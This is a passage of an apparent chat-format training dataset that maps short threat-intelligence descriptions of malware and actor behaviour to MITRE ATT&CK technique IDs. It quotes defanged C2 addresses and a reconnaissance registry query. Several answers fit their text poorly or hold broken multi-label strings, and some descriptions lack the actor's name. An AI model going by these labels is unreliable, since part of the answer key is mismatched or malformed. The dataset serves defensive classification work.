- "content": "Fgdump can dump Windows password hashes."
- },
- {
- "role": "assistant",
- "content": "T1003.002 - OS Credential Dumping: Security Account Manager"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emotet can brute force a local admin password, then use it to facilitate lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1078.003 - Valid Accounts: Local Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Molerats has used forged Microsoft code-signing certificates on malware."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PS1 is distributed as a set of encrypted files and scripts."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ThiefQuest encrypts a set of file extensions on a host, deletes the original files, and provides a ransom note with no contact information."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "version of adds a registry key to HKEY_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run for persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. xxmm (also known as Minzen) — This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - xxmm downloader (also known as KVNDM) — This simple downloader's code is similar to the main xxmm payload. MSGet — This persistent downloader uses a dead-drop resolver (DDR) to download and execute another malicious payload. MSGet typically downloads encoded binaries from hard-coded URLs. DGet — This simple downloader (see Figure 4) is similar to the wget web server retrieval tool. T-SMB Scan — This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Mimikatz credential dumper has been extended to include Skeleton Key domain controller authentication bypass functionality. The \"LSADUMP::ChangeNTLM\" and \"LSADUMP::SetNTLM\" modules can also manipulate the password hash of an account without knowing the clear text value."
- },
- {
- "role": "assistant",
- "content": "T1098 - Account Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Matryoshka is capable of performing screen captures."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Taidoor can copy cmd.exe into the system temp folder."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Motherboard Check The Trojan will perform the following WMI query: Select * from Win32_BaseBoard The Trojan will check the Manufacturer and Product fields in the results for the strings VMware, Virtual, VBox, VM or Oracle"
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks', 'T1497 - Virtualization/Sandbox Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While operating in the victim’s internal network, the threat actor accessed sensitive information specific to the products and services that the victim organization provided. This information included items such as product/service architecture and design documents, vulnerabilities and step-by-step instructions to perform various tasks. Additionally, the threat actor viewed pages related to internal business operations such as development schedules and points of contact"
- },
- {
- "role": "assistant",
- "content": "T1213 - Data from Information Repositories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It writes a file using two data structures: one associated with the file and other used for reading data from the C&C"
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has exfiltrated data over its C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BackConfig has the ability to use hidden columns in Excel spreadsheets to store executable files or commands for VBA macros."
- },
- {
- "role": "assistant",
- "content": "T1137.001 - Office Application Startup: Office Template Macros."
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KEYMARBLE gathers the MAC address of the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Neoichor can download additional files onto a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Diavol will terminate services using the Service Control Manager (SCM) API."
- },
- {
- "role": "assistant",
- "content": "T1489 - Service Stop"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ISMInjector hollows out a newly created process RegASM.exe and injects its payload into the hollowed process."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As seen below, the relational analysis proved to be quite fruitful: Figure 1 Overview of relationships We rapidly discovered a different set of tools communicating to the exact same C2 servers as those two Word documents, in addition to other tools communicating to other subdomain variations of chrome-up[.]date as seen in the following graphic: Figure 2 Command and control overlaps From there, we were able to map out a large infrastructure separating out into four categories of tools: downloaders, droppers, loaders, and payloads"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "38, the credentials are retrieved from the logins.json file and the browser history is retrieved from the places.sqlite database"
- },
- {
- "role": "assistant",
- "content": "T1217 - Browser Bookmark Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used reg query “HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default” on a victim to query the Registry."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to download files from the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Javali can capture login credentials from open browsers including Firefox, Chrome, Internet Explorer, and Edge."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "this is a late-stage kill chain attack that allows a threat actor with admin (domain or enterprise admin) credentials to leverage the replication mechanism in AD to register a rogue domain controller in order to inject backdoor changes to an AD domain. With that rogue DC, the attacker can manipulate AD data, including objects, and schemas."
- },
- {
- "role": "assistant",
- "content": "T1207 - Rogue Domain Controller"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the ability to identify any anti-virus installed on the infected system."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM can obtain a list of smart card readers attached to the victim."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NotPetya searches for files ending with dozens of different file extensions prior to encryption."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To obtain the session ID and pre-shared key, the payload will issue a query to resolve the following domain: mail. random number between 100000 and 999999>.<c2 name> This request notifies the C2 server that the payload is about to send system specific data as part of the initial handshake"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbanak has used a VBScript named \"ggldr\" that uses Google Apps Script, Sheets, and Forms services for C2."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "iKitten will zip up the /Library/Keychains directory before exfiltrating it."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once settles on victim’s information systems, Egregor communicates with its Command and Control servers via HTTPS protocol so as to drop scripts or dynamic link libraries on infected hosts. You can find the list of C2 identified during investigations in section “IP Addresses"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxxZ can download and execute additional files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RAT is able to delete files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This is likely to make it appear as if nothing is amiss to the user (as high CPU usage is a red flag of cryptocurrency-mining malware"
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Honeybee launches a DLL file that gets executed as a service using svchost.exe"
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sidewinder has used \"mshta.exe\" to execute malicious payloads."
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a tool that can copy files to remote machines."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers the MAC address of the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mis-Type has been injected directly into a running process, including `explorer.exe`."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collected the victim computer name, OS version, and architecture type and sent the information to its C2 server. also enumerated all available drives on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has infected victims using watering holes."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "P.A.S. Webshell can gain remote access and execution on target web servers."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "build_downer has the ability to send system volume information to C2."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ADVSTORESHELL can delete files and directories."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The observed JSS Loader infection led to the download and execution of a setup VBScript from https[:]//petshopbook[.]com"
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly 2.0 used various types of scripting to perform operations, including batch scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to create a remote shell and execute specified commands."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ProLock can remove files containing its payload after they are executed."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Frankenstein, the threat actors ran encoded commands from the command line."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SEKURLSA::Pth module can impersonate a user, with only a password hash, to execute arbitrary commands."
- },
- {
- "role": "assistant",
- "content": "T1550.002 - Use Alternate Authentication Material: Pass the Hash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has acquired servers to host their malicious tools."
- },
- {
- "role": "assistant",
- "content": "T1583.004 - Server"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "All the strings used by the malware are encrypted and are decrypted by Rijndael symmetric encryption algorithm in the “<Module>.\\u200E” function"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If the dwell time value for the active mode has been set, but the package has not been received, the dwell time value is incremented by the dwell time value for the active period"
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleSeed can call regsvr32.exe for execution."
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group has obfuscated .NET executables by inserting junk code."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete's collected data is encrypted with AES before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560.003 - Archive via Custom Method"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HermeticWiper can determine the OS version, bitness, and enumerate physical drives on a targeted host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Alongside evidence of compromise of the organization itself, Symantec also found a copy of one of the company’s own files, relating to its messaging software, on a staging server used by Chafer. The file was in a directory alongside a number of hacking tools used by the attackers"
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can list running services."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 has used scheduled tasks to establish persistence for various malware it uses, including downloaders known as HARDTACK and SHIPBREAD and FrameworkPOS."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zebrocy uses SSL and AES ECB for encrypting C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly 2.0 has performed screen captures of victims, including by using a tool, scr.exe (which matched the hash of ScreenUtil)."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbanak encrypts the message body of HTTP traffic with RC2 (in CBC mode). Carbanak also uses XOR with random keys for its communications."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater. MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East. We assess with moderate confidence that these documents were sent to victims via phishing emails. One such trojanized document was created on April 23, 2019. The \"Blackwater.bas\" macro was obfuscated using a substitution cipher whereby the characters are replaced with their corresponding integer. Screenshot of the stager found in the document The stager then reached out to the actor-controlled C2 server located at hxxp://38[.]132[.]99[.]167/crf.txt. The clear text version of the crf.txt file closely resembled the PowerShell agent that was previously used by the MuddyWater actors when they targeted Kurdish political groups and organizations in Turkey. rCecms=BlackWater\". Notably, the trojanized document's macro was also called \"BlackWater,\" and the value \"BlackWater\" was hard coded into the PowerShell script"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 has used fake job advertisements sent via LinkedIn to spearphish targets."
- },
- {
- "role": "assistant",
- "content": "T1566.003 - Spearphishing via Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Prikormka contains a keylogger module that collects keystrokes and the titles of foreground windows."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Avaddon has used encrypted strings."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The TajMahal framework is an intriguing discovery that’s of great interest, not least for its high level of technical sophistication, which is beyond any doubt. For example, it has its own indexer, emergency C2s, is capable of stealing specific files from external drives when they become available again, etc"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery', 'T1119 - Automated Collection', 'T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors accessed and collected credentials from password managers."
- },
- {
- "role": "assistant",
- "content": "T1555.005 - Password Managers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When G-Data published on Turla/Uroburos back in February, several questions remained unanswered. One big unknown was the infection vector for Turla (aka Snake or Uroburos). Our analysis indicates that victims are infected via a sophisticated multi-stage attack, which begins with the Epic Turla. In time, as the attackers gain confidence, this is upgraded to more sophisticated backdoors, such as the Carbon/Cobra system. Sometimes, both backdoors are run in tandem, and used to “rescue” each other if communications are lost with one of the backdoors"
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery', 'T1057 - Process Discovery', 'T1049 - System Network Connections Discovery', 'T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Finally, the loader spawns cmd.exe to perform a series of reconnaissance commands to obtain information about the network and domain"
- },
- {
- "role": "assistant",
- "content": "T1482 - Domain Trust Discovery', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
